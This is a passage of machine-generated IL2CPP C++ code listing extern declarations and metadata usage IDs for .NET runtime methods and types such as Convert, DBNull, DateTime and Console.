Convert_ToUInt64_m3D60F8111B12E0D8BB538E433065340CF45EB772_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt64_m97F318132CF70D2795CFB709BAB8789803BCC08A_RuntimeMethod_var; extern const RuntimeMethod* Convert_ToUInt64_mE0A19C049B47AC33472017793E0B8FCF5A9CE098_RuntimeMethod_var; extern const RuntimeMethod* CultureAwareComparer_GetHashCode_m6ADEE70C24EB4AAB42C72C9808DF036EDE055D9A_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToBoolean_m0F9A794EAEF58C50CFF9ECEE2760C4C63A0371B7_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToByte_m8DEEB8376504FD41BE96151D41A8F9933F4C606F_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToChar_m5B7CF101F29BCEAC2B229D25F8ADD330BDBD0793_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToDateTime_m3E8A9034AF13781C24C788FACCBD601637B73432_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToDecimal_mC30B1FDB8D3F4165E400A919FC0C1D5A5A5E6F0B_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToDouble_m7E3A77F228DEF3C0291F43571632FF0ADD22A8AA_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToInt16_mF1F70AA5E7C2F3A8DFDA93C46CD1F757208FDEB1_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToInt32_mE953190F1847562CC0CF798BE0237D903DFF7E67_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToInt64_m328C7202D595DF73985D48F2E6C3A8FD8E99977A_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToSByte_m858C48A31D48D55E63528C1FF77B32C6AB69BDDC_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToSingle_m83559328EDDA097F34DE62755E9014D5DC226435_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToUInt16_mB4DFF398A4EB0E54E2CD632E9728D7162DA7A5EB_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToUInt32_m4CFFCFF1F58EE869C907CC5A2C2421034A628B81_RuntimeMethod_var; extern const RuntimeMethod* DBNull_System_IConvertible_ToUInt64_m0F1C8A9AF9BEE4E93FF637569D1A0A28F1C2C628_RuntimeMethod_var; extern const RuntimeMethod* DBNull__ctor_m65FBEA4E461D29FD277A21BEAA693BD11DF7D3C9_RuntimeMethod_var; extern const RuntimeMethod* DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A_RuntimeMethod_var; extern const RuntimeMethod* DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_RuntimeMethod_var; extern const RuntimeMethod* DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0_RuntimeMethod_var; extern const RuntimeMethod* DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60_RuntimeMethod_var; extern const RuntimeMethod* DateTimeParse_MatchHebrewDigits_mAE589497302D66173A915086EFA3D4523966822E_RuntimeMethod_var; extern const RuntimeMethod* DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD_RuntimeMethod_var; extern const RuntimeMethod* DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A_RuntimeMethod_var; extern const RuntimeMethod* DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_RuntimeMethod_var; extern const RuntimeMethod* DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5_RuntimeMethod_var; extern const RuntimeMethod* DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2_RuntimeMethod_var; extern const RuntimeMethod* DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_RuntimeMethod_var; extern const RuntimeMethod* DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C_RuntimeMethod_var; extern const RuntimeMethod* DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64_RuntimeMethod_var; extern const RuntimeMethod* DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90_RuntimeMethod_var; extern const RuntimeMethod* DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F_RuntimeMethod_var; extern const RuntimeMethod* DateTime_FromBinary_m5A34F3CF87443A48B220F77B685C35B8A534E973_RuntimeMethod_var; extern const RuntimeMethod* DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E_RuntimeMethod_var; extern const RuntimeMethod* DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6_RuntimeMethod_var; extern const RuntimeMethod* DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB_RuntimeMethod_var; extern const RuntimeMethod* DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C_RuntimeMethod_var; extern const RuntimeMethod* DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_RuntimeMethod_var; extern const RuntimeMethod* DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_RuntimeMethod_var; extern const RuntimeMethod* DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_RuntimeMethod_var; extern const RuntimeMethod* DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84_RuntimeMethod_var; extern const RuntimeMethod* DateTime_op_Addition_m6CE7A79B6E219E67A75AB17545D1873529262282_RuntimeMethod_var; extern const RuntimeMethod* DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_MoveNext_m9E4024F4C87D1FE851B86685062E1EB389D56266_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_Reset_mA0ACBEBFF0955F4BF3B6CA08C028361AE993C1A4_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_get_Current_mD1C66071084DE980DC97EABCE7BFBCCF96066120_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E_RuntimeMethod_var; extern const RuntimeMethod* SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14_RuntimeMethod_var; extern const RuntimeMethod* StackEnumerator_MoveNext_m7C00619A440FB2C12C0A5C3C8CEB934250C3DE22_RuntimeMethod_var; extern const RuntimeMethod* StackEnumerator_Reset_m72AB015F4BB163EC9DC19457743EF309A4C24187_RuntimeMethod_var; extern const RuntimeMethod* StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22_RuntimeMethod_var; extern const RuntimeMethod* Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_RuntimeMethod_var; extern const RuntimeMethod* Stack_Peek_mEAC45FC37790CF917154F27345E106C2EE38346C_RuntimeMethod_var; extern const RuntimeMethod* Stack_Pop_m5419FBFC126E7004A81612F90B8137C5629F7CDE_RuntimeMethod_var; extern const RuntimeMethod* Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193_RuntimeMethod_var; extern const RuntimeMethod* WindowsConsole_DoWindowsConsoleCancelEvent_m4FAC7A4ADAFBDC6AACB88F9B38FCA6511BC79627_RuntimeMethod_var; extern const RuntimeType* Boolean_tB53F6830F670160873277339AA58F15CAED4399C_0_0_0_var; extern const RuntimeType* Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_0_0_0_var; extern const RuntimeType* Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_0_0_0_var; extern const RuntimeType* DBNull_t7400E04939C2C29699B389B106997892BF53A8E5_0_0_0_var; extern const RuntimeType* DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_0_0_0_var; extern const RuntimeType* Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_0_0_0_var; extern const RuntimeType* Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_0_0_0_var; extern const RuntimeType* Empty_t31C7ECDF7D102AFFCE029D8AB11D8595F0316ED2_0_0_0_var; extern const RuntimeType* Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_0_0_0_var; extern const RuntimeType* GregorianCalendar_tC611DFF7946345F7AF856B31987FEECB98DEE005_0_0_0_var; extern const RuntimeType* Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_0_0_0_var; extern const RuntimeType* Int32_t585191389E07734F19F3156FF88FB3EF4800D102_0_0_0_var; extern const RuntimeType* Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_0_0_0_var; extern const RuntimeType* RuntimeObject_0_0_0_var; extern const RuntimeType* SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_0_0_0_var; extern const RuntimeType* Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_0_0_0_var; extern const RuntimeType* String_t_0_0_0_var; extern const RuntimeType* UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_0_0_0_var; extern const RuntimeType* UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_0_0_0_var; extern const RuntimeType* UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_0_0_0_var; extern const uint32_t ConsoleCancelEventArgs__ctor_mF734EC3C82D0A490C0A05416E566BFC53ACFB471_MetadataUsageId; extern const uint32_t ConsoleDriver_CreateNullConsoleDriver_mEBAC4A508B85C44CCA50312BDB64A1A1B30FDA17_MetadataUsageId; extern const uint32_t ConsoleDriver_CreateTermInfoDriver_m93B83A6BC60910A8FDFA247BE56A30055E687342_MetadataUsageId; extern const uint32_t ConsoleDriver_CreateWindowsConsoleDriver_mB2C43CDD6BD7C2159D7B939D8EEBEA9BFC07F5DF_MetadataUsageId; extern const uint32_t ConsoleDriver_ReadKey_m26C9ECDAE36AEE4B923BFDD9420D341AB3DDA900_MetadataUsageId; extern const uint32_t ConsoleDriver__cctor_mD940A3DF23F49F26B5BAC4D5C1D96A9DD48FCA4A_MetadataUsageId; extern const uint32_t ConsoleDriver_get_IsConsole_m0C19F307DCAEDCC678CF0ABA69F8EF083090C731_MetadataUsageId; extern const uint32_t ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867_MetadataUsageId; extern const uint32_t ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98_MetadataUsageId; extern const uint32_t Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD_MetadataUsageId; extern const uint32_t Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F_MetadataUsageId; extern const uint32_t Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98_MetadataUsageId; extern const uint32_t Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823_MetadataUsageId; extern const uint32_t Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340_MetadataUsageId; extern const uint32_t Console_ReadKey_m64DBD2BDB13D04E2E73B95F1BD3B9D08B370D3BA_MetadataUsageId; extern const uint32_t Console_ReadKey_m8E93A1A91E2D0BE19342C479E9D769AB0C6E37B4_MetadataUsageId; extern const uint32_t Console_SetupStreams_m6CC1706E3A1838A0C710F3053EF589C7BA934065_MetadataUsageId; extern const uint32_t Console__cctor_m44FB48190CE1DCE878B95D9D397D29C7527BEE44_MetadataUsageId; extern const uint32_t Console_get_Error_mE1078EFC5C7C133964838D2A72B8FB9567E4C98A_MetadataUsageId; extern const uint32_t Console_get_InputEncoding_m60EAA2E167A0C8C681997B998E851D8CD6C954FE_MetadataUsageId; extern const uint32_t Console_get_OutputEncoding_mA23798B6CE69F59EAA00C8206EF8552196120647_MetadataUsageId; extern const uint32_t Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_MetadataUsageId; extern const uint32_t Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_MetadataUsageId; extern const uint32_t Convert_ConvertToBase64Array_m2C6DC2EA273DB7F37A3A25116F18AF6DB5192E3B_MetadataUsageId; extern const uint32_t Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_MetadataUsageId; extern const uint32_t Convert_FromBase64CharPtr_mBE2FEB558FE590EDCC320D6B864726889274B451_MetadataUsageId; extern const uint32_t Convert_FromBase64String_m079F788D000703E8018DA39BE9C05F1CBF60B156_MetadataUsageId; extern const uint32_t Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622_MetadataUsageId; extern const uint32_t Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82_MetadataUsageId; extern const uint32_t Convert_GetTypeCode_mFE36252E332A7D699C91003DF56C37380C1AD58D_MetadataUsageId; extern const uint32_t Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF_MetadataUsageId; extern const uint32_t Convert_ToBase64String_mF201749AD724C437524C8A6108519470A0F65B84_MetadataUsageId; extern const uint32_t Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6_MetadataUsageId; extern const uint32_t Convert_ToBoolean_m4C852F7D316D28B27B202BC731B26EA79F2955E0_MetadataUsageId; extern const uint32_t Convert_ToBoolean_m881535C7C6F8B032F5883E7F18A90C27690FB5E4_MetadataUsageId; extern const uint32_t Convert_ToBoolean_mB50CA6A7A647629B5CCC6BA10A06903B1912AF40_MetadataUsageId; extern const uint32_t Convert_ToByte_m2DDDB2A7442059FE2185B347BB71BF7577781807_MetadataUsageId; extern const uint32_t Convert_ToByte_m4D9F94693332601CE2F1CF8DB9933F7C0FE882B1_MetadataUsageId; extern const uint32_t Convert_ToByte_m5B2E3D791EE1E14A7604D126C24AA62FE2587B60_MetadataUsageId; extern const uint32_t Convert_ToByte_m645FE381788C101B2BE504F57811E655AD432935_MetadataUsageId; extern const uint32_t Convert_ToByte_m71CFEFDB61F13E2AD7ECF91BA5DEE0616C1E857A_MetadataUsageId; extern const uint32_t Convert_ToByte_m7D3D6E8B30620A208FC31EE6C29087EA6FDFF923_MetadataUsageId; extern const uint32_t Convert_ToByte_m91AFBFC15EA62AF9EA9826E3F777635C1E18F32C_MetadataUsageId; extern const uint32_t Convert_ToByte_mA8B21973561985CBAAAE340648DFCBE6B1A04771_MetadataUsageId; extern const uint32_t Convert_ToByte_mBA74300A0EBF60E75A3ABED4AA4AAB62DF40014A_MetadataUsageId; extern const uint32_t Convert_ToByte_mBF7D0A7CFDAB28F8B3D979168CFE7A6404A2A606_MetadataUsageId; extern const uint32_t Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64_MetadataUsageId; extern const uint32_t Convert_ToByte_mF058F63299585352A96AB211EF4DA55B9996ADA5_MetadataUsageId; extern const uint32_t Convert_ToByte_mF5A487816056F3D1509511E3CD8FA1DF3D91F581_MetadataUsageId; extern const uint32_t Convert_ToChar_m56A1099464A288FD3AB6F82B7433DB063F671B29_MetadataUsageId; extern const uint32_t Convert_ToChar_m5A1F3909973CE4894614B7444B430BE562456F8C_MetadataUsageId; extern const uint32_t Convert_ToChar_m5BD134B72978B879B81A824DFAC8FF29F5300245_MetadataUsageId; extern const uint32_t Convert_ToChar_m9171D149D77DE0FBB36CB4D91EEBDC06B2DD6F29_MetadataUsageId; extern const uint32_t Convert_ToChar_m94EF86BDBD5110CF4C652C48A625F546AA24CE95_MetadataUsageId; extern const uint32_t Convert_ToChar_m9F32E993218E9D544A9FCC6FE50D6501A838315F_MetadataUsageId; extern const uint32_t Convert_ToChar_mA5935B08EA798B0EFFE6EA960B9F23B43F8F44AF_MetadataUsageId; extern const uint32_t Convert_ToChar_mBFD88FBE8D41F3FEB4049B8EF556C2D996F5F531_MetadataUsageId; extern const uint32_t Convert_ToDateTime_m57803D920D7F8261F00652A19DD01E530A530795_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m0723C02BC98733C38A826B8BBF2C4AE24B7CB557_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m22A4086CA96BD7E3E1D23660A838AFA0F48946D6_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m291E4FE569EB911F06EF4269522C1DA0BEB7CB5F_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m4AC31B36EF41A7409233DEDB9389EA97FB981FDA_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m707FBD6E1B6D6F7F71D1D492C5F5AE981B561DEF_MetadataUsageId; extern const uint32_t Convert_ToDecimal_m80616EA9DCA3177D13755D16D12FE16F7EF93D6B_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mC4A6FC31B0F2C506D113380567B082CCB6A4FEED_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mD8F65E8B251DBE61789CAD032172D089375D1E5B_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mD9355C906353F7E283024449544616979EF4823E_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mECE2EDC28EBA5F0B88702C15D0A3A1DABEE8D6A1_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mF2C5F32DF4C8DC0938C223031CDDF4AC1E08A0CC_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mF93A2E5C1006C59187BA8F1F17E66CEC2D8F7FCE_MetadataUsageId; extern const uint32_t Convert_ToDecimal_mFD0BC78E6BE4EDBFD7A0767E7D95A39E40F0260F_MetadataUsageId; extern const uint32_t Convert_ToDouble_m053A47D87C59CA7A87D4E67E5E06368D775D7651_MetadataUsageId; extern const uint32_t Convert_ToDouble_m8EAF69AB183D6DF604898A3EDE5A27A4AFBFF1D8_MetadataUsageId; extern const uint32_t Convert_ToDouble_mB31B6067B5E9336860641CBD4424E17CA42EC3FA_MetadataUsageId; extern const uint32_t Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3_MetadataUsageId; extern const uint32_t Convert_ToInt16_m1F982FED72A4829E1DE1A64F162F13555FC1F7EC_MetadataUsageId; extern const uint32_t Convert_ToInt16_m452BBDF72FBBBF90915F464E0558DA82CE1F7DBF_MetadataUsageId; extern const uint32_t Convert_ToInt16_m57BC4B92DCAEAA22820CD1915778B407AC23D9C5_MetadataUsageId; extern const uint32_t Convert_ToInt16_m7F87DC717F07D47C104372D55D3E72FBE26CF2CC_MetadataUsageId; extern const uint32_t Convert_ToInt16_m9E4E48A97E050355468F58D2EAEB3AB3C811CE8B_MetadataUsageId; extern const uint32_t Convert_ToInt16_mBAB0E578750A2DE0990F9B301C7CBE2397A61A35_MetadataUsageId; extern const uint32_t Convert_ToInt16_mBB1C4102314D1306F894C0E3CC7FC72900EE4E13_MetadataUsageId; extern const uint32_t Convert_ToInt16_mC121EAEA7C8458D987480F1669C6A40082AA93C1_MetadataUsageId; extern const uint32_t Convert_ToInt16_mE8E094D5AD321E5E6756E332116FAF1C084A1CD2_MetadataUsageId; extern const uint32_t Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C_MetadataUsageId; extern const uint32_t Convert_ToInt32_m4D644EB3F03017202A65F4CADB3382BF81FF5D71_MetadataUsageId; extern const uint32_t Convert_ToInt32_m4E8E4BA500C8372D58B20E706C76C8126F7F5260_MetadataUsageId; extern const uint32_t Convert_ToInt32_m5CE30569A0A5B70CBD85954BEEF436F57D6FAE6B_MetadataUsageId; extern const uint32_t Convert_ToInt32_m5D40340597602FB6C20BAB933E8B29617232757A_MetadataUsageId; extern const uint32_t Convert_ToInt32_m8DC81C7C49EE4A9334E71E45E3A220644E45B4F4_MetadataUsageId; extern const uint32_t Convert_ToInt32_m966337716B0CC4A45307D82BC21BCA1F8BB22D1C_MetadataUsageId; extern const uint32_t Convert_ToInt32_mA9271FF590B90ADF4072A0FBF2C7F59874FA5EC4_MetadataUsageId; extern const uint32_t Convert_ToInt32_mCF1152AF4138C1DD7A16643B22EE69A38373EF86_MetadataUsageId; extern const uint32_t Convert_ToInt64_m396C2B4FA8F12D0C76E0AA3A31872D93BF5EA11D_MetadataUsageId; extern const uint32_t Convert_ToInt64_m64CA1F639893BC431286C0AE8266AA46E38FB57D_MetadataUsageId; extern const uint32_t Convert_ToInt64_m66912A2344452B0C97DD3EE60A8560A49248CF78_MetadataUsageId; extern const uint32_t Convert_ToInt64_m6963E5AB9C468141588B8BE08A9F2454A066D3CA_MetadataUsageId; extern const uint32_t Convert_ToInt64_m740F0CA2696F5D04F06456FCBFE08E942B12B4A6_MetadataUsageId; extern const uint32_t Convert_ToInt64_m8964FDE5D82FEC54106DBF35E1F67D70F6E73E29_MetadataUsageId; extern const uint32_t Convert_ToSByte_m0D0A382E0BFF2DAE7019CAB2F6309EB48EFFFD94_MetadataUsageId; extern const uint32_t Convert_ToSByte_m1A4B3CD0081049789B368AE723C5214669A80767_MetadataUsageId; extern const uint32_t Convert_ToSByte_m2716303126BD8C930D1D4E8590F8706A8F26AD48_MetadataUsageId; extern const uint32_t Convert_ToSByte_m286EC501DE7B1980DE30BBB28DDA70AE4BB696E5_MetadataUsageId; extern const uint32_t Convert_ToSByte_m2BA3408A7B10119B60B923928EFCFA17D3C46D50_MetadataUsageId; extern const uint32_t Convert_ToSByte_m4455F931B18E5D87DE1F99B2686F3D4770E9D177_MetadataUsageId; extern const uint32_t Convert_ToSByte_m5F3E822A40FB8BC9DCE9D39C07D0BFDB5CAE38C3_MetadataUsageId; extern const uint32_t Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34_MetadataUsageId; extern const uint32_t Convert_ToSByte_m750B83AD00E06419AEDFE4436323AF85520E3E00_MetadataUsageId; extern const uint32_t Convert_ToSByte_m97BA7655D1C139BC268A90E503AFD4489558BE32_MetadataUsageId; extern const uint32_t Convert_ToSByte_mCC85C35F01295663A487DDA2C4855C5962ADA2AF_MetadataUsageId; extern const uint32_t Convert_ToSByte_mFFC0642A84BC819A5DED67F18AD2ED18A8F80CD1_MetadataUsageId; extern const uint32_t Convert_ToSingle_mB30A36F02973B8210209CA62F2DD7B212857845A_MetadataUsageId; extern const uint32_t Convert_ToSingle_mDC4B8C88AF6F230E79A887EFD4D745CB08341828_MetadataUsageId; extern const uint32_t Convert_ToString_m10FC2E5535B944C2DFE83E6D2659122C9408F0FF_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m022D5C7E373AE755EF157BE123D6856C9A931DFC_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m13E0B382AD753A7931E9583BDF9091719617F70C_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m19D8F9B74EB5F96C835FA5045E925F000750A8B3_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m3A0BC273AC75E936BBAA48B0D451DB161CEC11CE_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m3BC2069048E0E6C17C6B4C18BFB8FC949739BFFF_MetadataUsageId; extern const uint32_t Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7_MetadataUsageId; extern const uint32_t Convert_ToUInt16_mA5386907A6E781E3D4261BDB7D6308FBD5B518F7_MetadataUsageId; extern const uint32_t Convert_ToUInt16_mB7311DB5960043FD81C1305B69C5328126F43C89_MetadataUsageId; extern const uint32_t Convert_ToUInt16_mC488D697C85EE1862D2D8FFFD30BC8E99AB73BE5_MetadataUsageId; extern const uint32_t Convert_ToUInt16_mC540754A3F101A7A13FB26FD89836025507E7E80_MetadataUsageId; extern const uint32_t Convert_ToUInt32_m2726353738A26D6688A1F8F074056C17A09B3A84_MetadataUsageId; extern const uint32_t Convert_ToUInt32_m78245CD2AE3D0369F5A99FF013AF73FFBB8CF869_MetadataUsageId; extern const uint32_t Convert_ToUInt32_m7DC544C6EB3CA7920C82A243D9C387B462697BAC_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mA22ABF80925CA54B6B4869939964184C7F344B41_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mB53B83E03C15DCD785806793ACC3083FCC7F4BCA_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mC305AB953ECDC1EDEC3F76C2ED9C2898A6A2D8A8_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mD1B91075B4D330E0D2D4600A6D5283C2FA1586E4_MetadataUsageId; extern const uint32_t Convert_ToUInt32_mE576F9C14D9BA51A0E3471521033BF798781CCE7_MetadataUsageId; extern const uint32_t Convert_ToUInt64_m24AAA55A63E618B389C773AC090EB4F664BFC729_MetadataUsageId; extern const uint32_t Convert_ToUInt64_m3D60F8111B12E0D8BB538E433065340CF45EB772_MetadataUsageId; extern const uint32_t Convert_ToUInt64_m4A02F154C2265302484CD2741DF92C14531134F0_MetadataUsageId; extern const uint32_t Convert_ToUInt64_m97F318132CF70D2795CFB709BAB8789803BCC08A_MetadataUsageId; extern const uint32_t Convert_ToUInt64_mA246C8DD45C3EA0EFB21E3ED8B6EE6FAAE119232_MetadataUsageId; extern const uint32_t Convert_ToUInt64_mA8C3C5498FC28CBA0EB0C37409EB9E04CCF6B8D2_MetadataUsageId; extern const uint32_t Convert_ToUInt64_mC9816AF80E8B2471627DB2BE1E4A02160D8BAFF3_MetadataUsageId; extern const uint32_t Convert_ToUInt64_mE0A19C049B47AC33472017793E0B8FCF5A9CE098_MetadataUsageId; extern const uint32_t Convert__cctor_m04895F6ACC7D3D4BC92FC0CB5F24EBBEDF7FA9D1_MetadataUsageId; extern const uint32_t CultureAwareComparer_Equals_mEA38131EAA97A1058C5A284AE1F9A03DC8412CD2_MetadataUsageId; extern const uint32_t CultureAwareComparer_GetHashCode_m6ADEE70C24EB4AAB42C72C9808DF036EDE055D9A_MetadataUsageId; extern const uint32_t CultureAwareComparer__ctor_m932FEC0DC86BAD111BC13357F712B51262F4EB28_MetadataUsageId; extern const uint32_t CurrentSystemTimeZone__ctor_m19D1DDA56D25F55B9EF411773A18CC0914DA61C4_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToBoolean_m0F9A794EAEF58C50CFF9ECEE2760C4C63A0371B7_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToByte_m8DEEB8376504FD41BE96151D41A8F9933F4C606F_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToChar_m5B7CF101F29BCEAC2B229D25F8ADD330BDBD0793_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToDateTime_m3E8A9034AF13781C24C788FACCBD601637B73432_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToDecimal_mC30B1FDB8D3F4165E400A919FC0C1D5A5A5E6F0B_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToDouble_m7E3A77F228DEF3C0291F43571632FF0ADD22A8AA_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToInt16_mF1F70AA5E7C2F3A8DFDA93C46CD1F757208FDEB1_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToInt32_mE953190F1847562CC0CF798BE0237D903DFF7E67_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToInt64_m328C7202D595DF73985D48F2E6C3A8FD8E99977A_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToSByte_m858C48A31D48D55E63528C1FF77B32C6AB69BDDC_MetadataUsageId; extern const uint32_t 